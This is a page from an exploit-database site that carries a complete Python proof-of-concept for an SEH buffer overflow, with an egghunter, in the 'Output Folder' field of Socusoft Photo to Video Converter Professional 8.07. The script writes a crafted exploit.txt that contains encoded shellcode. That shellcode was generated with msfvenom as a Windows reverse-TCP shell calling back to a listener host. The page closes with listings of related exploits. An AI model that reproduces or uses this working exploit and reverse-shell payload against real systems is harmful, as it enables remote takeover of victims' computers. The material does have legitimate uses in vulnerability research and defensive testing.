Menu

Search for hundreds of thousands of exploits

"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)"

Author

Exploit author

MasterVlad

Platform

Exploit platform

windows

Release date

Exploit published date

2020-07-26

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-23
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html
# Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe
# Version: 8.07
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 10 x64

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output
# 4. Paste the clipboard into the 'Output Folder' field and click on Open

#!/usr/bin/python

# Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI

buf =  ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53"
buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b"
buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42"
buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77"
buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45"
buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f"
buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52"
buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c"
buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76"
buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31"
buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30"
buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61"
buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78"
buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d"
buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56"
buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76"
buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33"
buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70"
buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70"
buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f"
buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63"
buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48"
buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50"
buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58"
buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42"
buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70"
buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37"
buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f"
buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34"
buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68"
buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61"
buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35"
buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72"
buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c"
buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a"
buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39"
buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43"
buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76"
buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e"
buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64"
buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31"
buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78"
buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c"
buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70"
buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58"
buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48"
buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57"
buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70"
buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72"
buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41"



egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"

exploit = "A"*304
exploit += "\x74\x06\x75\x04"
# 0x10047a1e
exploit += "\x1e\x7a\x04\x10"
exploit += egg
exploit += "B"*(2000-312-len(egg))
exploit += "T00WT00W"
exploit += buf

f = open("exploit.txt", "w")
f.write(exploit)
f.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-11-24 "docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)" local windows MasterVlad
2020-07-26 "docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)" local windows MasterVlad
2020-07-26 "Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)" local windows MasterVlad
2020-07-26 "DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter)" local windows MasterVlad
2020-07-26 "Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)" local windows MasterVlad
2020-07-23 "Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH)" local windows MasterVlad 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected